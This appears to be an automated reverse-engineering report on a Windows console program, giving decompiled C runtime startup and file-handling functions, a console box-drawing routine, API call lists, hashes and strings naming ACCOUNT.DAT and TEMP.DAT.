                                                									 *((short*)(_t138 + 4)) = 0xa00;
                                                									 *_t138 =  *_t138 | 0xffffffff;
                                                									 *(_t138 + 8) = _t130;
                                                									 *(_t138 + 0x24) =  *(_t138 + 0x24) & 0x00000080;
                                                									 *((short*)(_t138 + 0x25)) = 0xa0a;
                                                									 *(_t138 + 0x38) = _t130;
                                                									 *(_t138 + 0x34) = _t130;
                                                									_t138 = _t138 + 0x40;
                                                									 *(_t155 - 0x24) = _t138;
                                                								}
                                                								_t149 = _t149 + 1;
                                                								 *(_t155 - 0x30) = _t149;
                                                								_t135 =  *(_t155 - 0x1c);
                                                								continue;
                                                							}
                                                							_t135 =  *0x1252f5c; // 0x0
                                                							 *(_t155 - 0x1c) = _t135;
                                                							break;
                                                						}
                                                						_t143 = _t130;
                                                						 *(_t155 - 0x2c) = _t143;
                                                						_t109 =  *((intOrPtr*)(_t155 - 0x28));
                                                						_t139 =  *(_t155 - 0x20);
                                                						while(1) {
                                                							__eflags = _t143 - _t135;
                                                							if(_t143 >= _t135) {
                                                								goto L31;
                                                							}
                                                							_t150 =  *_t139;
                                                							__eflags = _t150 - 0xffffffff;
                                                							if(_t150 == 0xffffffff) {
                                                								L26:
                                                								_t143 = _t143 + 1;
                                                								 *(_t155 - 0x2c) = _t143;
                                                								_t109 =  *((intOrPtr*)(_t155 - 0x28)) + 1;
                                                								 *((intOrPtr*)(_t155 - 0x28)) = _t109;
                                                								_t139 =  &(_t139[1]);
                                                								 *(_t155 - 0x20) = _t139;
                                                								continue;
                                                							}
                                                							__eflags = _t150 - 0xfffffffe;
                                                							if(_t150 == 0xfffffffe) {
                                                								goto L26;
                                                							}
                                                							_t111 =  *_t109;
                                                							__eflags = _t111 & 0x00000001;
                                                							if((_t111 & 0x00000001) == 0) {
                                                								goto L26;
                                                							}
                                                							__eflags = _t111 & 0x00000008;
                                                							if((_t111 & 0x00000008) != 0) {
                                                								L24:
                                                								_t154 = ((_t143 & 0x0000001f) << 6) + 0x1252f60[_t143 >> 5];
                                                								 *(_t155 - 0x24) = _t154;
                                                								 *_t154 =  *_t139;
                                                								 *((char*)(_t154 + 4)) =  *((intOrPtr*)( *((intOrPtr*)(_t155 - 0x28))));
                                                								_t38 = _t154 + 0xc; // 0xd
                                                								InitializeCriticalSectionAndSpinCount(_t38, 0xfa0);
                                                								_t39 = _t154 + 8;
                                                								 *_t39 =  *(_t154 + 8) + 1;
                                                								__eflags =  *_t39;
                                                								_t139 =  *(_t155 - 0x20);
                                                								L25:
                                                								_t135 =  *(_t155 - 0x1c);
                                                								goto L26;
                                                							}
                                                							_t119 = GetFileType(_t150);
                                                							_t139 =  *(_t155 - 0x20);
                                                							__eflags = _t119;
                                                							if(_t119 == 0) {
                                                								goto L25;
                                                							}
                                                							goto L24;
                                                						}
                                                						goto L31;
                                                					}
                                                					E012396F0(_t155, 0x1251380, _t155 - 0x10, 0xfffffffe);
                                                					_t86 = 0;
                                                					goto L3;
                                                				}
                                                				E012396F0(_t155, 0x1251380, _t155 - 0x10, 0xfffffffe);
                                                				goto L2;
                                                			}


                                                APIs
                                                • __lock.LIBCMT ref: 0123A5F0
                                                  • Part of subcall function 0123BE5F: __mtinitlocknum.LIBCMT ref: 0123BE71
                                                  • Part of subcall function 0123BE5F: EnterCriticalSection.KERNEL32(?,?,0123D668,0000000D,?,?,?,?,0124DA28,00000008,0123D601,00000000,00000000,01238F04,01241E56,00000000), ref: 0123BE8A
                                                • @_EH4_CallFilterFunc@8.LIBCMT ref: 0123A60E
                                                • __calloc_crt.LIBCMT ref: 0123A627
                                                • @_EH4_CallFilterFunc@8.LIBCMT ref: 0123A642
                                                • GetStartupInfoW.KERNEL32(?,0124D8C0,00000064), ref: 0123A697
                                                • __calloc_crt.LIBCMT ref: 0123A6E2
                                                • GetFileType.KERNEL32(00000001), ref: 0123A729
                                                • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 0123A762
                                                • GetStdHandle.KERNEL32(-000000F6), ref: 0123A81B
                                                • GetFileType.KERNEL32(00000000), ref: 0123A82D
                                                • InitializeCriticalSectionAndSpinCount.KERNEL32(-01252F54,00000FA0), ref: 0123A862
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709383013.0000000001231000.00000020.00020000.sdmp, Offset: 01230000, based on PE: true
                                                • Associated: 00000001.00000002.709376180.0000000001230000.00000002.00020000.sdmp
                                                • Associated: 00000001.00000002.709398870.0000000001248000.00000002.00020000.sdmp
                                                • Associated: 00000001.00000002.709408539.000000000124F000.00000008.00020000.sdmp
                                                • Associated: 00000001.00000002.709417916.0000000001255000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: CriticalSection$CallCountFileFilterFunc@8InitializeSpinType__calloc_crt$EnterHandleInfoStartup__lock__mtinitlocknum
                                                • String ID:
                                                • API String ID: 1456538442-0
                                                • Opcode ID: 7bd5386416da2a80b1bfe652698dc1ea5e87dc77cf984593b2a9860356245ecc
                                                • Instruction ID: d3a5339f0ff54ce574991e69b7e1bb8cd5b723a080aac4cff005c7f88482fc43
                                                • Opcode Fuzzy Hash: 7bd5386416da2a80b1bfe652698dc1ea5e87dc77cf984593b2a9860356245ecc
                                                • Instruction Fuzzy Hash: 9191E0B1924346CFDB25CFA8D8845ADBBB4AF85324B24426ED5A6EB2D1D7349803CB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 91%
                                                			_entry_(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                                                				intOrPtr _t17;
                                                				void* _t24;
                                                				void* _t25;
                                                				void* _t26;
                                                				signed int _t38;
                                                				void* _t40;
                                                				void* _t46;
                                                				signed int _t49;
                                                				void* _t51;
                                                				void* _t53;
                                                				void* _t60;
                                                
                                                				_t60 = __fp0;
                                                				_t47 = __edi;
                                                				_t46 = __edx;
                                                				E0123FC48();
                                                				_push(0x14);
                                                				_push(0x124d838);
                                                				E01239160(__ebx, __edi, __esi);
                                                				_t49 = E0123C013() & 0x0000ffff;
                                                				E0123FBFB(2);
                                                				_t53 =  *0x1230000 - 0x5a4d; // 0x5a4d
                                                				if(_t53 == 0) {
                                                					_t17 =  *0x123003c; // 0xf0
                                                					__eflags =  *((intOrPtr*)(_t17 + 0x1230000)) - 0x4550;
                                                					if( *((intOrPtr*)(_t17 + 0x1230000)) != 0x4550) {
                                                						goto L2;
                                                					} else {
                                                						__eflags =  *((intOrPtr*)(_t17 + 0x1230018)) - 0x10b;
                                                						if( *((intOrPtr*)(_t17 + 0x1230018)) != 0x10b) {
                                                							goto L2;
                                                						} else {
                                                							_t38 = 0;
                                                							__eflags =  *((intOrPtr*)(_t17 + 0x1230074)) - 0xe;
                                                							if( *((intOrPtr*)(_t17 + 0x1230074)) > 0xe) {
                                                								__eflags =  *(_t17 + 0x12300e8);
                                                								_t6 =  *(_t17 + 0x12300e8) != 0;
                                                								__eflags = _t6;
                                                								_t38 = 0 | _t6;
                                                							}
                                                						}
                                                					}
                                                				} else {
                                                					L2:
                                                					_t38 = 0;
                                                				}
                                                				 *(_t51 - 0x1c) = _t38;
                                                				if(E0123D058() == 0) {
                                                					E012389F5(0x1c);
                                                				}
                                                				if(E0123D6D2(_t38, _t47) == 0) {
                                                					_t19 = E012389F5(0x10);
                                                				}
                                                				E0123BE1F(_t19);
                                                				 *(_t51 - 4) =  *(_t51 - 4) & 0x00000000;
                                                				E0123A5C3();
                                                				 *0x1254080 = GetCommandLineA();
                                                				 *0x1252284 = E0123FCE2();
                                                				_t24 = E0123F8ED();
                                                				_t56 = _t24;
                                                				if(_t24 < 0) {
                                                					E0123751F(_t38, _t46, _t47, _t49, _t56, 8);
                                                				}
                                                				_t25 = E0123FB1A(_t38, _t46, _t47, _t49);
                                                				_t57 = _t25;
                                                				if(_t25 < 0) {
                                                					E0123751F(_t38, _t46, _t47, _t49, _t57, 9);
                                                				}
                                                				_t26 = E01237559(_t47, _t49, 1);
                                                				_pop(_t40);
                                                				_t58 = _t26;
                                                				if(_t26 != 0) {
                                                					E0123751F(_t38, _t46, _t47, _t49, _t58, _t26);
                                                					_pop(_t40);
                                                				}
                                                				_t50 = E01231040(_t40, _t47, _t49, _t58, _t60, 0x1230000, 0, E0123FD6D(), _t49);
                                                				 *((intOrPtr*)(_t51 - 0x24)) = _t28;
                                                				if(_t38 == 0) {
                                                					E012377B1(_t50);
                                                				}
                                                				E0123754A();
                                                				 *(_t51 - 4) = 0xfffffffe;
                                                				return E012391A5(_t50);
                                                			}


                                                APIs
                                                • ___security_init_cookie.LIBCMT ref: 012388A7
                                                  • Part of subcall function 0123C013: GetStartupInfoW.KERNEL32(?), ref: 0123C01D
                                                • _fast_error_exit.LIBCMT ref: 01238920
                                                • _fast_error_exit.LIBCMT ref: 01238931
                                                • __RTC_Initialize.LIBCMT ref: 01238937
                                                • __ioinit0.LIBCMT ref: 01238940
                                                • GetCommandLineA.KERNEL32(0124D838,00000014), ref: 01238945
                                                • ___crtGetEnvironmentStringsA.LIBCMT ref: 01238950
                                                • __setargv.LIBCMT ref: 0123895A
                                                • __setenvp.LIBCMT ref: 0123896B
                                                • __cinit.LIBCMT ref: 0123897E
                                                • __wincmdln.LIBCMT ref: 0123898F
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709383013.0000000001231000.00000020.00020000.sdmp, Offset: 01230000, based on PE: true
                                                • Associated: 00000001.00000002.709376180.0000000001230000.00000002.00020000.sdmp
                                                • Associated: 00000001.00000002.709398870.0000000001248000.00000002.00020000.sdmp
                                                • Associated: 00000001.00000002.709408539.000000000124F000.00000008.00020000.sdmp
                                                • Associated: 00000001.00000002.709417916.0000000001255000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: _fast_error_exit$CommandEnvironmentInfoInitializeLineStartupStrings___crt___security_init_cookie__cinit__ioinit0__setargv__setenvp__wincmdln
                                                • String ID:
                                                • API String ID: 1504447550-0
                                                • Opcode ID: 1db386982e46f10f23fcd98f99f45147b105bdf8e9ce75bcd7cf12a2ab20f1f7
                                                • Instruction ID: acb88bd50112b435b4ca55ab7925efa647529ededd94379bb1d7c77e9e9c0735
                                                • Opcode Fuzzy Hash: 1db386982e46f10f23fcd98f99f45147b105bdf8e9ce75bcd7cf12a2ab20f1f7
                                                • Instruction Fuzzy Hash: 3A210AF0A303079AEF297BB87989B3D61546FE0711F100629FA05AF1C1EFB485459767
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E01238E23(void* __eflags, signed int _a4) {
                                                				void* _t12;
                                                				signed int _t13;
                                                				signed int _t16;
                                                				intOrPtr _t18;
                                                				void* _t22;
                                                				signed int _t35;
                                                				long _t40;
                                                
                                                				_t13 = E0123A5A7(_t12);
                                                				if(_t13 >= 0) {
                                                					_t35 = _a4;
                                                					if(E01240132(_t35) == 0xffffffff) {
                                                						L10:
                                                						_t40 = 0;
                                                					} else {
                                                						_t18 =  *0x1252f60; // 0x0
                                                						if(_t35 != 1 || ( *(_t18 + 0x84) & 0x00000001) == 0) {
                                                							if(_t35 != 2 || ( *(_t18 + 0x44) & 0x00000001) == 0) {
                                                								goto L8;
                                                							} else {
                                                								goto L7;
                                                							}
                                                						} else {
                                                							L7:
                                                							_t22 = E01240132(2);
                                                							if(E01240132(1) == _t22) {
                                                								goto L10;
                                                							} else {
                                                								L8:
                                                								if(CloseHandle(E01240132(_t35)) != 0) {
                                                									goto L10;
                                                								} else {
                                                									_t40 = GetLastError();
                                                								}
                                                							}
                                                						}
                                                					}
                                                					E012400AC(_t35);
                                                					 *((char*)( *((intOrPtr*)(0x1252f60 + (_t35 >> 5) * 4)) + ((_t35 & 0x0000001f) << 6) + 4)) = 0;
                                                					if(_t40 == 0) {
                                                						_t16 = 0;
                                                					} else {
                                                						_t16 = E01238EDE(_t40) | 0xffffffff;
                                                					}
                                                					return _t16;
                                                				} else {
                                                					return _t13 | 0xffffffff;
                                                				}
                                                			}











                                                APIs
                                                • __ioinit.LIBCMT ref: 01238E26
                                                  • Part of subcall function 0123A5A7: InitOnceExecuteOnce.KERNEL32(0125229C,0123A5E2,00000000,00000000,01241205,?,?,01239886,00000000,?,?,?,012371AD,-00000020,0124D7B8,0000000C), ref: 0123A5B5
                                                • __get_osfhandle.LIBCMT ref: 01238E3A
                                                • __get_osfhandle.LIBCMT ref: 01238E65
                                                • __get_osfhandle.LIBCMT ref: 01238E6E
                                                • __get_osfhandle.LIBCMT ref: 01238E7A
                                                • CloseHandle.KERNEL32(00000000,01232656,00000000,?,012441AB,01232656,?,?,?,?,?,?,?,01232656,00000000,00000109), ref: 01238E81
                                                • GetLastError.KERNEL32(?,012441AB,01232656,?,?,?,?,?,?,?,01232656,00000000,00000109), ref: 01238E8B
                                                • __free_osfhnd.LIBCMT ref: 01238E98
                                                • __dosmaperr.LIBCMT ref: 01238EBA
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709383013.0000000001231000.00000020.00020000.sdmp, Offset: 01230000, based on PE: true
                                                • Associated: 00000001.00000002.709376180.0000000001230000.00000002.00020000.sdmp
                                                • Associated: 00000001.00000002.709398870.0000000001248000.00000002.00020000.sdmp
                                                • Associated: 00000001.00000002.709408539.000000000124F000.00000008.00020000.sdmp
                                                • Associated: 00000001.00000002.709417916.0000000001255000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: __get_osfhandle$Once$CloseErrorExecuteHandleInitLast__dosmaperr__free_osfhnd__ioinit
                                                • String ID:
                                                • API String ID: 974577687-0
                                                • Opcode ID: 8d684c59b6378d56574df08a52cb65e741712e5cc6b8dc3aea46e737f3c48de3
                                                • Instruction ID: 2e61fbbffd079c0724c4cb380e572d66de274ccfef6c0ece69cbc68b92e70275
                                                • Opcode Fuzzy Hash: 8d684c59b6378d56574df08a52cb65e741712e5cc6b8dc3aea46e737f3c48de3
                                                • Instruction Fuzzy Hash: 921125B2A312125AE636227CA84877E7B595FD1734F150309FB288F1C2EAB4D4818260
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 01236EF1: __fsopen.LIBCMT ref: 01236EFC
                                                • _swscanf.LIBCMT ref: 01233B48
                                                  • Part of subcall function 01237021: _vfscanf.LIBCMT ref: 01237035
                                                • _fprintf.LIBCMT ref: 01233DA6
                                                Strings
                                                • TEMP.DAT, xrefs: 01233AE2
                                                • %s %s %s %s %s %s %c %s %c %f %f %f, xrefs: 01233B3D
                                                • ACCOUNT.DAT, xrefs: 01233ABE
                                                • %s %s %s %s %s %s %c %s %c %.2f %.2f %.2f, xrefs: 01233D9A
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709383013.0000000001231000.00000020.00020000.sdmp, Offset: 01230000, based on PE: true
                                                • Associated: 00000001.00000002.709376180.0000000001230000.00000002.00020000.sdmp
                                                • Associated: 00000001.00000002.709398870.0000000001248000.00000002.00020000.sdmp
                                                • Associated: 00000001.00000002.709408539.000000000124F000.00000008.00020000.sdmp
                                                • Associated: 00000001.00000002.709417916.0000000001255000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: __fsopen_fprintf_swscanf_vfscanf
                                                • String ID: %s %s %s %s %s %s %c %s %c %.2f %.2f %.2f$%s %s %s %s %s %s %c %s %c %f %f %f$ACCOUNT.DAT$TEMP.DAT
                                                • API String ID: 1563022539-2055742014
                                                • Opcode ID: 096a3f031dae880d0dca30786343e2b8a2f2da7bf0c031cd899281287a665c27
                                                • Instruction ID: 1e0091e21be034537487b3644022e42d3baa6bba919610de958e542c07569839
                                                • Opcode Fuzzy Hash: 096a3f031dae880d0dca30786343e2b8a2f2da7bf0c031cd899281287a665c27
                                                • Instruction Fuzzy Hash: 5491A672D105599FCB09DFA8E991BEDFBB9FF85300F04826EE006BA185E6745684CF50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 76%
                                                			E01231380(void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                				intOrPtr _v8;
                                                				intOrPtr _v12;
                                                				void* __ebp;
                                                				intOrPtr _t61;
                                                				intOrPtr _t67;
                                                				void* _t75;
                                                				intOrPtr _t87;
                                                				void* _t103;
                                                				void* _t104;
                                                				void* _t105;
                                                				void* _t106;
                                                
                                                				_t102 = __esi;
                                                				_t101 = __edi;
                                                				E012312B0(_a4, _a8);
                                                				_push(0xc9);
                                                				_push("%c");
                                                				E0123715C(_t75, __edi, __esi, __eflags);
                                                				_t104 = _t103 + 8;
                                                				_v8 = _a4 + 1;
                                                				while(1) {
                                                					_t109 = _v8 - _a12 - 1;
                                                					if(_v8 >= _a12 - 1) {
                                                						break;
                                                					}
                                                					E012312B0(_v8, _a8);
                                                					_push(0xcd);
                                                					_push("%c");
                                                					E0123715C(_t75, _t101, _t102, _t109);
                                                					_t104 = _t104 + 8;
                                                					_v8 = _v8 + 1;
                                                				}
                                                				E012312B0(_v8, _a8);
                                                				_push(0xbb);
                                                				_push("%c");
                                                				E0123715C(_t75, _t101, _t102, __eflags);
                                                				_t105 = _t104 + 8;
                                                				_v12 = _a8 + 1;
                                                				while(1) {
                                                					__eflags = _v12 - _a16;
                                                					if(__eflags >= 0) {
                                                						break;
                                                					}
                                                					E012312B0(_a4, _v12);
                                                					_v8 = _a4;
                                                					while(1) {
                                                						__eflags = _v8 - _a12;
                                                						if(_v8 >= _a12) {
                                                							break;
                                                						}
                                                						__eflags = _v8 - _a4;
                                                						if(__eflags == 0) {
                                                							L12:
                                                							E012312B0(_v8, _v12);
                                                							_push(0xba);
                                                							_push("%c");
                                                							E0123715C(_t75, _t101, _t102, __eflags);
                                                							_t105 = _t105 + 8;
                                                						} else {
                                                							__eflags = _v8 - _a12 - 1;
                                                							if(__eflags == 0) {
                                                								goto L12;
                                                							}
                                                						}
                                                						_t67 = _v8 + 1;
                                                						__eflags = _t67;
                                                						_v8 = _t67;
                                                					}
                                                					_t87 = _v12 + 1;
                                                					__eflags = _t87;
                                                					_v12 = _t87;
                                                				}
                                                				E012312B0(_a4, _v12);
                                                				_push(0xc8);
                                                				_push("%c");
                                                				E0123715C(_t75, _t101, _t102, __eflags);
                                                				_t106 = _t105 + 8;
                                                				_v8 = _a4 + 1;
                                                				while(1) {
                                                					__eflags = _v8 - _a12 - 1;
                                                					if(__eflags >= 0) {
                                                						break;
                                                					}
                                                					E012312B0(_v8, _v12);
                                                					_push(0xcd);
                                                					_push("%c");
                                                					E0123715C(_t75, _t101, _t102, __eflags);
                                                					_t106 = _t106 + 8;
                                                					_t61 = _v8 + 1;
                                                					__eflags = _t61;
                                                					_v8 = _t61;
                                                				}
                                                				E012312B0(_v8, _v12);
                                                				_push(0xbc);
                                                				_push("%c");
                                                				return E0123715C(_t75, _t101, _t102, __eflags);
                                                			}















                                                APIs
                                                  • Part of subcall function 012312B0: GetStdHandle.KERNEL32(000000F5,00000000,?,01231393,?,?,?,01231236), ref: 012312D1
                                                  • Part of subcall function 012312B0: SetConsoleCursorPosition.KERNEL32(00000000,?,01231393,?,?,?,01231236), ref: 012312D8
                                                • _wprintf.LIBCMT ref: 0123139D
                                                • _wprintf.LIBCMT ref: 012313DB
                                                  • Part of subcall function 0123715C: __stbuf.LIBCMT ref: 012371A8
                                                  • Part of subcall function 0123715C: __output_s_l.LIBCMT ref: 012371C2
                                                  • Part of subcall function 0123715C: __ftbuf.LIBCMT ref: 012371D6
                                                • _wprintf.LIBCMT ref: 012313FC
                                                • _wprintf.LIBCMT ref: 01231470
                                                • _wprintf.LIBCMT ref: 01231493
                                                • _wprintf.LIBCMT ref: 012314D1
                                                • _wprintf.LIBCMT ref: 012314F2
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709383013.0000000001231000.00000020.00020000.sdmp, Offset: 01230000, based on PE: true
                                                • Associated: 00000001.00000002.709376180.0000000001230000.00000002.00020000.sdmp
                                                • Associated: 00000001.00000002.709398870.0000000001248000.00000002.00020000.sdmp
                                                • Associated: 00000001.00000002.709408539.000000000124F000.00000008.00020000.sdmp
                                                • Associated: 00000001.00000002.709417916.0000000001255000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: _wprintf$ConsoleCursorHandlePosition__ftbuf__output_s_l__stbuf
                                                • String ID:
                                                • API String ID: 1778593935-0
                                                • Opcode ID: d565dd80be8008ec78f8ceb4850a97238b3a12cb881bf5c464ebe02ef2e5c193
                                                • Instruction ID: 8c03bac9d8d8c861079f4183ec1c32dae2de8ece5af7cbee838b039b6d6bb4dd
                                                • Opcode Fuzzy Hash: d565dd80be8008ec78f8ceb4850a97238b3a12cb881bf5c464ebe02ef2e5c193
                                                • Instruction Fuzzy Hash: F84133F5A3420AFBCB04EFA8CD41EAE7775EFD5300F108159EA05AB340D670AB649B95
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 91%
                                                			E0123D6D2(void* __ebx, void* __edi) {
                                                				void* __esi;
                                                				void* _t3;
                                                				intOrPtr _t6;
                                                				long _t14;
                                                				long* _t27;
                                                
                                                				E012375FE(_t3);
                                                				if(E0123BF8E() != 0) {
                                                					_t6 = E0123BFD8(_t5, E0123D468);
                                                					 *0x1251a40 = _t6;
                                                					__eflags = _t6 - 0xffffffff;
                                                					if(_t6 == 0xffffffff) {
                                                						goto L1;
                                                					} else {
                                                						_t27 = E0123C55B(1, 0x3b8);
                                                						__eflags = _t27;
                                                						if(_t27 == 0) {
                                                							L6:
                                                							E0123D748();
                                                							__eflags = 0;
                                                							return 0;
                                                						} else {
                                                							__eflags = E0123C002(_t9,  *0x1251a40, _t27);
                                                							if(__eflags == 0) {
                                                								goto L6;
                                                							} else {
                                                								_push(0);
                                                								_push(_t27);
                                                								E0123D626(__ebx, __edi, _t27, __eflags);
                                                								_t14 = GetCurrentThreadId();
                                                								_t27[1] = _t27[1] | 0xffffffff;
                                                								 *_t27 = _t14;
                                                								__eflags = 1;
                                                								return 1;
                                                							}
                                                						}
                                                					}
                                                				} else {
                                                					L1:
                                                					E0123D748();
                                                					return 0;
                                                				}
                                                			}









                                                APIs
                                                • __init_pointers.LIBCMT ref: 0123D6D2
                                                  • Part of subcall function 012375FE: EncodePointer.KERNEL32(00000000,?,0123D6D7,0123892B,0124D838,00000014), ref: 01237601
                                                  • Part of subcall function 012375FE: __initp_misc_winsig.LIBCMT ref: 01237622
                                                • __mtinitlocks.LIBCMT ref: 0123D6D7
                                                  • Part of subcall function 0123BF8E: InitializeCriticalSectionAndSpinCount.KERNEL32(012513D0,00000FA0,?,?,0123D6DC,0123892B,0124D838,00000014), ref: 0123BFAC
                                                • __mtterm.LIBCMT ref: 0123D6E0
                                                • __calloc_crt.LIBCMT ref: 0123D705
                                                • __initptd.LIBCMT ref: 0123D727
                                                • GetCurrentThreadId.KERNEL32 ref: 0123D72E
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709383013.0000000001231000.00000020.00020000.sdmp, Offset: 01230000, based on PE: true
                                                • Associated: 00000001.00000002.709376180.0000000001230000.00000002.00020000.sdmp
                                                • Associated: 00000001.00000002.709398870.0000000001248000.00000002.00020000.sdmp
                                                • Associated: 00000001.00000002.709408539.000000000124F000.00000008.00020000.sdmp
                                                • Associated: 00000001.00000002.709417916.0000000001255000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: CountCriticalCurrentEncodeInitializePointerSectionSpinThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm
                                                • String ID:
                                                • API String ID: 2211675822-0
                                                • Opcode ID: 9295f8d04cf5905bfba25c83ee9590b70e321e08d59421d6f0bf874627e8c1c3
                                                • Instruction ID: 7980fe4ec559113fe8c3f0a295304233713501a1f50290607d484c6b11b841ea
                                                • Opcode Fuzzy Hash: 9295f8d04cf5905bfba25c83ee9590b70e321e08d59421d6f0bf874627e8c1c3
                                                • Instruction Fuzzy Hash: 91F0F6F25797571BE73A3ABC780676636D48BD1670B60061AF525D60C4EE20D0418594
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 88%
                                                			E0123BB6C(void* __eflags, signed char _a4, signed int* _a8) {
                                                				signed int _v8;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				void* __ebp;
                                                				void* _t43;
                                                				signed int _t44;
                                                				signed int _t45;
                                                				signed int _t48;
                                                				signed int _t52;
                                                				void* _t60;
                                                				signed int _t62;
                                                				void* _t64;
                                                				signed int _t67;
                                                				signed int _t70;
                                                				signed int _t74;
                                                				signed int _t76;
                                                				void* _t77;
                                                				signed int _t85;
                                                				void* _t86;
                                                				signed int _t87;
                                                				signed int _t89;
                                                				signed int* _t92;
                                                
                                                				_t44 = E0123A5A7(_t43);
                                                				if(_t44 >= 0) {
                                                					_t92 = _a8;
                                                					_t45 = E01238BB2(_t92);
                                                					_t74 = _t92[3];
                                                					_t89 = _t45;
                                                					__eflags = _t74 & 0x00000082;
                                                					if(__eflags != 0) {
                                                						__eflags = _t74 & 0x00000040;
                                                						if(__eflags == 0) {
                                                							_t70 = 0;
                                                							__eflags = _t74 & 0x00000001;
                                                							if((_t74 & 0x00000001) == 0) {
                                                								L10:
                                                								_t48 = _t92[3] & 0xffffffef | 0x00000002;
                                                								_t92[3] = _t48;
                                                								_t92[1] = _t70;
                                                								__eflags = _t48 & 0x0000010c;
                                                								if((_t48 & 0x0000010c) == 0) {
                                                									_t60 = E01238C70();
                                                									__eflags = _t92 - _t60 + 0x20;
                                                									if(_t92 == _t60 + 0x20) {
                                                										L13:
                                                										_t62 = E012411E7(_t89);
                                                										__eflags = _t62;
                                                										if(_t62 == 0) {
                                                											goto L14;
                                                										}
                                                									} else {
                                                										_t64 = E01238C70();
                                                										__eflags = _t92 - _t64 + 0x40;
                                                										if(_t92 != _t64 + 0x40) {
                                                											L14:
                                                											E0124192E(_t92);
                                                										} else {
                                                											goto L13;
                                                										}
                                                									}
                                                								}
                                                								__eflags = _t92[3] & 0x00000108;
                                                								if((_t92[3] & 0x00000108) == 0) {
                                                									__eflags = 1;
                                                									_push(1);
                                                									_v8 = 1;
                                                									_push( &_a4);
                                                									_push(_t89);
                                                									_t45 = E01240343(_t70, _t86, _t89, _t92, 1);
                                                									_t70 = _t45;
                                                									goto L27;
                                                								} else {
                                                									_t87 = _t92[2];
                                                									_t25 = _t87 + 1; // 0x1a06
                                                									 *_t92 = _t25;
                                                									_t76 =  *_t92 - _t87;
                                                									_v8 = _t76;
                                                									_t92[1] = _t92[6] - 1;
                                                									__eflags = _t76;
                                                									if(__eflags <= 0) {
                                                										__eflags = _t89 - 0xffffffff;
                                                										if(_t89 == 0xffffffff) {
                                                											L22:
                                                											_t77 = 0x1251390;
                                                										} else {
                                                											__eflags = _t89 - 0xfffffffe;
                                                											if(_t89 == 0xfffffffe) {
                                                												goto L22;
                                                											} else {
                                                												_t77 = ((_t89 & 0x0000001f) << 6) +  *((intOrPtr*)(0x1252f60 + (_t89 >> 5) * 4));
                                                											}
                                                										}
                                                										__eflags =  *(_t77 + 4) & 0x00000020;
                                                										if(__eflags == 0) {
                                                											goto L25;
                                                										} else {
                                                											_push(2);
                                                											_push(_t70);
                                                											_push(_t70);
                                                											_push(_t89);
                                                											_t45 = E012417B4(_t70, _t89, _t92, __eflags) & _t87;
                                                											__eflags = _t45 - 0xffffffff;
                                                											if(_t45 == 0xffffffff) {
                                                												goto L28;
                                                											} else {
                                                												goto L25;
                                                											}
                                                										}
                                                									} else {
                                                										_push(_t76);
                                                										_push(_t87);
                                                										_push(_t89);
                                                										_t70 = E01240343(_t70, _t87, _t89, _t92, __eflags);
                                                										L25:
                                                										_t45 = _a4;
                                                										 *(_t92[2]) = _t45;
                                                										L27:
                                                										__eflags = _t70 - _v8;
                                                										if(_t70 == _v8) {
                                                											_t52 = _a4 & 0x000000ff;
                                                										} else {
                                                											L28:
                                                											_t40 =  &(_t92[3]);
                                                											 *_t40 = _t92[3] | 0x00000020;
                                                											__eflags =  *_t40;
                                                											goto L29;
                                                										}
                                                									}
                                                								}
                                                							} else {
                                                								_t92[1] = 0;
                                                								__eflags = _t74 & 0x00000010;
                                                								if((_t74 & 0x00000010) == 0) {
                                                									_t92[3] = _t74 | 0x00000020;
                                                									L29:
                                                									_t52 = _t45 | 0xffffffff;
                                                								} else {
                                                									_t85 = _t74 & 0xfffffffe;
                                                									__eflags = _t85;
                                                									 *_t92 = _t92[2];
                                                									_t92[3] = _t85;
                                                									goto L10;
                                                								}
                                                							}
                                                						} else {
                                                							_t67 = E01238EFF(__eflags);
                                                							 *_t67 = 0x22;
                                                							goto L6;
                                                						}
                                                					} else {
                                                						_t67 = E01238EFF(__eflags);
                                                						 *_t67 = 9;
                                                						L6:
                                                						_t92[3] = _t92[3] | 0x00000020;
                                                						_t52 = _t67 | 0xffffffff;
                                                					}
                                                					return _t52;
                                                				} else {
                                                					return _t44 | 0xffffffff;
                                                				}
                                                			}


























                                                APIs
                                                • __ioinit.LIBCMT ref: 0123BB70
                                                  • Part of subcall function 0123A5A7: InitOnceExecuteOnce.KERNEL32(0125229C,0123A5E2,00000000,00000000,01241205,?,?,01239886,00000000,?,?,?,012371AD,-00000020,0124D7B8,0000000C), ref: 0123A5B5
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709383013.0000000001231000.00000020.00020000.sdmp, Offset: 01230000, based on PE: true
                                                • Associated: 00000001.00000002.709376180.0000000001230000.00000002.00020000.sdmp
                                                • Associated: 00000001.00000002.709398870.0000000001248000.00000002.00020000.sdmp
                                                • Associated: 00000001.00000002.709408539.000000000124F000.00000008.00020000.sdmp
                                                • Associated: 00000001.00000002.709417916.0000000001255000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: Once$ExecuteInit__ioinit
                                                • String ID:
